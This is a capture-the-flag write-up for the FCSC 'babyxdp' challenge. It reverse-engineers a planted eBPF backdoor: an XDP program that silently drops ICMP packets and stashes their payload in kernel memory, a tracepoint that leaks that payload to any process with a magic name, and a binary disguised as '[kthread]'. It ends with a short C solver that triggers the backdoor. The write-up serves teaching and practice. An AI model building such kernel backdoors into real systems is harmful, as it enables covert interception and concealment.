Resources
- https://en.wikipedia.org/wiki/Express_Data_Path - Wikipedia entry for XDP.
- https://docs.kernel.org/bpf/libbpf/libbpf_overview.html - Overview of libbpf for Linux kernel.
- https://bpftool.dev/ - A command-line tool to inspect and manage BPF objects.
- https://github.com/xdp-project/xdp-tutorial/ - XDP programming tutorial Github repository.
- https://docs.kernel.org/trace/tracepoints.html - Linux kernel tracepoints documentation.
Solution
The flag is sent over the network in an ICMP packet, intercepted by an XDP program and stored in kernel memory. There is a backdoor to retrieve it. Compile the following program to a file named 0bd6fcd9
then run chmod +x 0bd6fcd9 && PATH=. 0bd6fcd9
to trigger the backdoor and receive the flag in userspace.
##include <fcntl.h>
##include <sys/syscall.h>
##define SYS_openat 0x101
int main() {
char data[256];
for (int i = 0; i < 256; i++) { data[i] = 0; }
syscall(SYS_openat, AT_FDCWD, data);
write(1, data, 128);
}
Detailed solution
First let’s extract the archive and find what we are working with.
$ tar xvf babyxdp.tar.xz && cd generated && tree
.
├── buildroot
│ ├── bzImage
│ └── rootfs.ext2
├── docker-compose.yml
├── Dockerfile
├── flag
├── qemu
│ ├── bios-256k.bin
│ ├── efi-virtio.rom
│ ├── kvmvapic.bin
│ ├── linuxboot_dma.bin
│ └── qemu-system-x86_64
└── run.sh
3 directories, 11 files
To understand the challenge setup, we take a look at the Docker files first.
$ cat docker-compose.yml
services:
baby-xdp:
build: .
ports:
- "4000:4000"
environment:
- FLAG=FCSC{ceci est un faux flag}
$ cat Dockerfile
[...]
WORKDIR /app
EXPOSE 4000
USER ctf
CMD ["socat", "tcp-l:4000,reuseaddr,fork", "EXEC:\"/app/run.sh\",pty,stderr"]
The Docker container is running /app/run.sh
which we can interact with by connecting to port 4000. The run.sh
script contains only the following command, which starts a full system emulation with QEMU. It is running a Linux kernel image, with the rootfs.ext2
filesystem mounted, and a network device configured with MAC address 02:ca:fe:42:00:01
.
The -netdev stream,id=n,addr.type=fd,addr.str=%d
configures file descriptor based networking using the “stream” backend. This allows sending network packet to the machine via a file descriptor. %d
will be replaced at runtime before the QEMU command is executed.
##!/bin/bash
/app/flag /app/qemu-system-x86_64 \
-m 256m \
-bios /app/bios-256k.bin \
-kernel bzImage \
-snapshot \
-drive file=rootfs.ext2,if=virtio,format=raw \
-append "rootwait root=/dev/vda console=ttyS0 no_timer_check" \
-nodefaults \
-device virtio-net-pci,netdev=n,mac=02:ca:fe:42:00:01 \
-netdev stream,id=n,addr.type=fd,addr.str=%d \
-vga none \
-nographic \
-serial stdio \
-monitor none
Notice that /app/qemu-system-x86_64
is not launched directly, but it is wrapped by /app/flag
. Before starting the machine, we can first open the flag
executable in Ghidra or IDA to understand what it is doing.
undefined8 main(int argc, char **argv) {
__pid_t fd;
int sv;
undefined4 local_10;
int r;
r = socketpair(1,1,0,&sv);
if (r != 0) {
err(1,"socketpair failed");
}
fd = fork();
if (fd == -1) {
err(1,"fork failed");
}
else if (fd != 0) {
fixup_fd(argv + 1,local_10);
execv(argv[1],argv + 1);
err(1,"execv failed");
return 0;
}
interact(sv);
return 0;
}
The program forks into two processes.
- The first process calls
fixup_fd
to replace%d
by the correct file descriptor (“fix fd for wiring packets to qemu instance”), then runs the command given by command line arguments (in this case/app/qemu-system-x86_64 [...]
). - The other process runs the
interact
function which callssend_flag
in an infinite loop.
void interact(int fd) {
ssize_t n;
undefined1 buffer [1504];
pollfd pollfd;
int r;
do {
while( true ) {
while( true ) {
pollfd.events = 1;
pollfd.revents = 0;
pollfd.fd = fd;
r = poll(&pollfd,1,1000);
if (r != 0) break;
send_flag(fd);
}
if (r != 1) break;
n = read(fd,buffer,1504);
r = (int)n;
}
perror("poll failed");
} while( true );
}
After renaming some variables in the send_flag
function, we understand that it is simply crafting and sending a network packet containing the flag to the QEMU machine. More precisely:
- The packet an ICMP packet containing the flag in the data field.
- The ICMP packet is encapsulated by a TCP/IPv4 header, specifying source address
198.131.0.1
and destination address198.131.0.2
. - The TCP/IP packet is encapsulated by an Ethernet header, specifying destination address
02:ca:fe:42:00:01
, the same MAC address as in the QEMU command.
void send_flag(undefined4 param_1) {
in_addr_t src_addr;
in_addr_t dst_addr;
size_t flag_len;
uint32_t total_len;
iovec iovecs [5];
byte icmp_payload [8];
byte ip_payload [20];
byte eth_payload [14];
char *flag;
uint16_t id_ip;
long n;
dst_addr = inet_addr("198.131.0.2");
src_addr = inet_addr("198.131.0.1");
flag = getenv("FLAG");
if (flag == (char *)0x0) {
flag = "FCSC{ceci est un faux flag}";
}
iovecs[0].iov_base = &total_len;
iovecs[0].iov_len = 4;
iovecs[1].iov_base = eth_payload;
iovecs[1].iov_len = 14;
// Destination MAC address 02:ca:fe:42:00:01
eth_payload[0] = 2;
eth_payload[1] = 0xca;
eth_payload[2] = 0xfe;
eth_payload[3] = 0x42;
eth_payload[4] = 0;
eth_payload[5] = 1;
memset(eth_payload + 6,0,6); // Source MAC address 00:00:00:00:00:00
eth_payload._12_2_ = htons(0x800); // Type: IPV4
iovecs[2].iov_base = ip_payload;
iovecs[2].iov_len = 20;
ip_payload[0] = 0x45; // Version: 4
ip_payload[1] = 0;
flag_len = strlen(flag);
ip_payload._2_2_ = htons((short)flag_len + 0x1c);
id_ip = id_ip.0;
id_ip.0 = id_ip.0 + 1;
ip_payload._4_2_ = htons(id_ip); // Unique identification
ip_payload[6] = 0;
ip_payload[7] = 0;
ip_payload[8] = 1;
ip_payload[9] = 1; // Protocol: ICMP (1)
iovecs[3].iov_base = icmp_payload;
iovecs[3].iov_len = 8;
icmp_payload[0] = 8; // Type: 8 (Echo (ping) request)
icmp_payload[1] = 0;
icmp_payload[4] = 0;
icmp_payload[5] = 0;
icmp_payload[6] = 0;
icmp_payload[7] = 0;
icmp_payload[2] = 0;
icmp_payload[3] = 0;
// ICMP data
iovecs[4].iov_base = flag;
ip_payload._12_4_ = src_addr;
ip_payload._16_4_ = dst_addr;
iovecs[4].iov_len = strlen(flag);
n = iovecs[4].iov_len + 42;
total_len = htonl((uint32_t)n);
do_writev(param_1,iovecs,5,n + iovecs[0].iov_len);
return;
}
Now that we understand the setup, the goal is to find a way to obtain the flag sent over the network. Let’s connect to the QEMU machine (nc localhost 4000
) and confirm that we have IP 198.131.0.2
on a network interface eth0
with MAC address 02:ca:fe:42:00:01
.
$ ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 02:ca:fe:42:00:01 brd ff:ff:ff:ff:ff:ff
inet 198.131.0.2/29 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::ca:feff:fe42:1/64 scope link
valid_lft forever preferred_lft forever
As it is explained in the challenge description, trying to run tcpdump
to capture the network packets sent to the machine yields no result. But why?
The challenge title hints at XDP, a quick Google search explains that it refers to the technology called “eXpress Data Path”, described as “an eBPF-based high-performance network data path used to send and receive network packets at high rates by bypassing most of the operating system networking stack”.
Basically, XDP is a framework that makes it possible to process a network packet immediately when it is received by the network interface, before going through the usual kernel path. This works by attaching a so-called XDP program to a network interface, which is executed whenever a new packet is received. This program can decide to drop the packet, forward it to the normal network stack or even redirect it to another network interface card.
Since XDP programs are executed in kernelspace and we are not root on the machine, we will have no chance to read the ICMP packet from userspace if it is dropped or does not go through the usual network stack.
Fortunately, if we start looking in the QEMU machine, we find a suspicious backdoor
executable at the root of the Linux filesystem. It is owned by root but we can at least read it. To analyze it we can use the base64
command and copy paste it before decoding it in our environment.
$ ls -la /backdoor
-rwxr-xr-x 1 root root 14632 Mar 11 16:25 /backdoor
First the program calls prctl(PR_SET_NAME, "[kthread]");
to rename itself as [kthread]
in order to be less suspicious. Then it uses libbpf, a library that takes compiled eBPF programs, prepares them and loads them into the Linux kernel. This is the usual mechanism used to load XDP programs in the kernel. In the following piece of code of the backdoor
function:
bpf_object_skeleton
is a structure that contains all the information required to load the program with libbpf.bpf_prog_skeleton
contains information about the actual eBPF program to load into the kernel. Two functions are declared,xdp_prog
andtrace_enter_open_at
. The code is loaded from thePROG
variable of thebackdoor
executable.bpf_map_skeleton
contains information about a memory mapping that will be used by the eBPF program, namelybackdoor.bss
.
bpf_object_skeleton = (bpf_object_skeleton *)calloc(1, 0x48);
if (bpf_object_skeleton == (bpf_object_skeleton *)0x0) {
iVar2 = -0xc;
bpf_object__destroy_skeleton(bpf_object_skeleton);
}
else {
bpf_object_skeleton->sz = 72;
bpf_object_skeleton->name = "backdoor_bpf";
bpf_object_skeleton->obj = (undefined8 *)&bpf->field_0x8;
bpf_object_skeleton->map_cnt = 1;
bpf_object_skeleton->map_skel_sz = 0x18;
bpf_map_skeleton = (bpf_map_skeleton *)calloc(1,0x18);
bpf_object_skeleton->maps = bpf_map_skeleton;
if (bpf_map_skeleton == (bpf_map_skeleton *)0x0) goto LAB_0010137b;
bpf_map_skeleton->map = (void **)&bpf->field_0x10;
bpf_map_skeleton->name = "backdoor.bss";
bpf_map_skeleton->mmaped = &bpf[1].field0_0x0;
bpf_object_skeleton->prog_cnt = 2;
bpf_object_skeleton->prog_skel_sz = 0x18;
bpf_prog_skeleton = (bpf_prog_skeleton *)calloc(2,0x18);
bpf_object_skeleton->progs = bpf_prog_skeleton;
if (bpf_prog_skeleton == (bpf_prog_skeleton *)0x0) goto LAB_0010137b;
bpf->field0_0x0 = bpf_object_skeleton;
bpf_prog_skeleton->prog = (void **)&bpf->field17_0x18;
bpf_prog_skeleton->link = (void **)&bpf->field_0x28;
bpf_prog_skeleton->name = "xdp_prog";
bpf_prog_skeleton[1].prog = (void **)&bpf->field_0x20;
bpf_prog_skeleton[1].name = "trace_enter_open_at";
bpf_prog_skeleton[1].link = (void **)&bpf->field_0x30;
bpf_object_skeleton->data_sz = 1736;
bpf_object_skeleton->data = &PROG;
iVar2 = bpf_object__open_skeleton(bpf_object_skeleton,0);
if (iVar2 == 0) {
iVar2 = bpf_object__load_skeleton(bpf->field0_0x0);
if (iVar2 == 0) {
iVar2 = bpf_object__attach_skeleton(bpf->field0_0x0);
if (iVar2 == 0) {
fd = bpf_program__fd(bpf->field17_0x18);
uVar3 = bpf_xdp_attach(if,fd,2,0);
if (uVar3 == 0) {
do {
sleep(1);
} while( true );
}
fprintf(stderr,"failed to attach BPF to iface %s (%d): %d\n",__ifname,(ulong)if,
(ulong)uVar3);
}
else {
fputs("failed to attach BPF\n",stderr);
}
}
else {
fprintf(stderr,"failed to load BPF object: %d\n");
}
destroy_bpf(bpf);
return 1;
}
}
The XDP program is loaded into the kernel using bpf_xdp_attach
. To verify this, we can also run the backdoor
executable as root on a different machine and use the bpftool
utility to inspect the running eBPF objects in the kernel.
$ sudo ./backdoor
$ sudo bpftool prog
[...]
371: xdp name xdp_prog tag dc3a1b7222bc57bd gpl
loaded_at 2025-04-21T02:51:23+0200 uid 0
xlated 264B jited 171B memlock 4096B map_ids 53
pids [kthread](162663)
372: tracepoint name trace_enter_ope tag 45f5bc76bef40ef8 gpl
loaded_at 2025-04-21T02:51:23+0200 uid 0
xlated 248B jited 179B memlock 4096B map_ids 53
pids [kthread](162663)
The first entry is the function xdp_prog
, the XDP program and the second one is the function trace_enter_openat
, which is recognized as a kernel tracepoint. The next step is to extract PROG
and reverse engineer the xdp_prog
function to understand what is happening to the ICMP packet.
undefined8 xdp_prog(xdp_md *ctx) {
long res;
byte *data;
byte *data_end;
ulonglong size;
byte *ptr;
byte *ptr2;
void *flag_ptr;
flag_ptr = flag;
_res = 2;
data_end = *(byte **)&ctx->data_end;
data = *(byte **)ctx;
ptr = data + 14;
if ((((ptr <= data_end) && (*(longlong *)(data + 12) == 8)) && (data + 34 <= data_end)) &&
(((ptr + (*(ulonglong *)ptr & 15) * 4 <= data_end && (*(longlong *)(data + 23) == 1)) &&
(ptr2 = ptr + (*(ulonglong *)ptr & 15) * 4 + 8, ptr2 <= data_end)))) {
size = (longlong)data_end - (longlong)ptr2;
if (126 < size) {
size = 127;
}
bpf_probe_read_kernel(flag,(u32)size,ptr2);
*(undefined1 *)((longlong)flag_ptr + 127) = 0;
_res = 1;
}
return _res;
}
By default the function returns 2, the value of XDP_PASS
(see https://elixir.bootlin.com/linux/v6.12/source/include/uapi/linux/bpf.h#L6441) and means that the packet should proceed to the usual network stack. If a certain condition is met, it returns 1 instead, the value of XDP_DROP
. The condition can be split into two parts:
*(longlong *)(data + 12) == 8)
=> Type field in the Ethernet header, 8 means IPv4.*(longlong *)(data + 23) == 1)
=> Protocol field in the IPv4 header, 1 means ICMP protocol.
We conclude that this XDP program will drop any ICMP packet. This is why it was not possible to see them using tcpdump
earlier. However, it will also call bpf_probe_read_kernel(flag, size, ptr2)
. This has the effect of storing the ICMP payload into a flag
variable, located in the .bss
section. Since the program is running in kernelspace, the flag that is sent over the network is stored somewhere in kernel memory and we have no chance of recovering it for now.
Then let’s analyze the other loaded eBPF object, the trace_enter_open_at
tracepoint. It is interesting because it will be called in kernelspace whenever an openat
syscall is invoked from userspace.
int trace_enter_open_at(syscalls_enter_open_arg *ctx) {
void *dst;
byte buf [16];
dst = *(void **)&ctx->filename_ptr;
bpf_get_current_comm((char *)buf,16);
/* 0bd6fcd9 */
if (buf[0] == '0' && buf[1] == 'b' && buf[2] == 'd' && buf[3] == '6' &&
buf[4] == 'f' && buf[5] == 'c' && buf[6] == 'd' && buf[7] == '9') {
bpf_probe_write_user(dst, flag, 128);
}
return 0;
This is exactly what we are looking for. This function looks up the name of the process that invoked the syscall and if it matches the string “0bd6fcd9”, then it copies the content of the flag variable from kernel memory to the userspace memory pointed by the filename_ptr
argument of the openat
syscall.
We have now found all the pieces of the puzzle to obtain the flag. Simply run an executable called “0bd6fcd9” and invoke an openat
syscall to receive the flag from the kernel. The following C program can be used to do so.
##include <fcntl.h>
##include <sys/syscall.h>
##define SYS_openat 0x101
int main() {
char data[256];
for (int i = 0; i < 256; i++) { data[i] = 0; }
syscall(SYS_openat, AT_FDCWD, data); // The flag will be written in the data buffer
write(1, data, 128);
}
To get a very lightweight executable and have no issue copying it in base64 to the QEMU machine, you can use an alternative libc such as diet libc or even write the program directly in assembly. If using diet libc, make sure to add the -lcompat
flag to avoid linking issues.
$ diet -v gcc solve.c -o 0bd6fcd9
gcc -nostdlib -static -L/opt/diet/lib-x86_64 /opt/diet/lib-x86_64/start.o solve.c -o 0bd6fcd9 -isystem /opt/diet/include -D__dietlibc__ /opt/diet/lib-x86_64/libc.a -lgcc /opt/diet/lib-x86_64/crtend.o
/usr/bin/ld: /tmp/cc9Hnvhf.o: in function `main':
solve.c:(.text+0x63): undefined reference to `syscall'
collect2: error: ld returned 1 exit status
$ gcc -nostdlib -static -L/opt/diet/lib-x86_64 /opt/diet/lib-x86_64/start.o -Wall solve.c -o 0bd6fcd9 -isystem /opt/diet/include -D__dietlibc__ /opt/diet/lib-x86_64/libc.a -lgcc /opt/diet/lib-x86_64/crtend.o -lcompat
Finally, we run the program in the QEMU machine with chmod +x 0bd6fcd9 && PATH=. 0bd6fcd9
to ensure that our process is named 0bd6fcd9
and not ./0bd6fcd9
. An alternative method is to use the prctl(PR_SET_NAME)
syscall to rename the process at runtime, like the backdoor
executable was doing earlier to conceal itself.
$ chmod +x 0bd6fcd9 && PATH=. 0bd6fcd9
FCSC{8c69e56ea0b77707419072935d5878a61eaea9f576dfe456b76eb1159b8ac217}